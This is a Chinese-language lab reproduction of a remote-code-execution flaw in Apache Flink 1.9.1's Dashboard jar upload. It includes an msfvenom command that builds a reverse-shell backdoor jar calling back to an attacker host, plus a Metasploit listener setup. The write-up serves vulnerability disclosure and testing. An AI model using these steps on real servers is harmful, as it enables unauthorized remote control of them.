##0x00 簡介 Flink核心是一個流式的數據流執行引擎,其針對數據流的分布式計算提供了數據分布、數據通信以及容錯機制等功能。基於流執行引擎,Flink提供了諸多更高抽象層的API以便用戶編寫分布式任務。
##0x01 漏洞概述 攻擊者可直接在Apache Flink Dashboard頁面中上傳任意jar包,從而達到遠程代碼執行的目的。
##0x02 影響版本 至目前最新版本Apache Flink 1.9.1 漏洞危害: 高危
##0x03 環境搭建 kali 192.168.115.43 受害機 win10 192.168.115.16 攻擊者 測試環境:Flink 1.9.1 java8+ Apache Flink 1.9.1安裝包下載
https://www.apache.org/dyn/closer.lua/flink/flink-1.9.1/flink-1.9.1-bin-scala_2.11.tgz
##0x04 漏洞復現 1)tar -zxvf flink-1.9.1-bin-scala_2.11.tgz 2)到bin文件夾運行./start-cluster.sh
3)環境搭建成功 目標站點 http://127.0.0.1:8081
4)生成jar后門包 msfvenom -p java/meterpreter/reverse_tcp LHOST=192.168.115.16 LPORT=2019 -f jar > sylon.jar
5)攻擊機訪問目標站點 並上傳sylon.jar
6)配置監聽 use exploit/multi/handler set payload java/shell/reverse_tcp set LHOST 192.168.115.16 set LPORT 2019 show options run
7)漏洞觸發
##0x05 修復方案 等待官網更新補丁或等待官網出最新版本后及時更新
##0x06 參考文檔 https://mp.weixin.qq.com/s/HTFDYWlXfYe7fyGNJVwpSw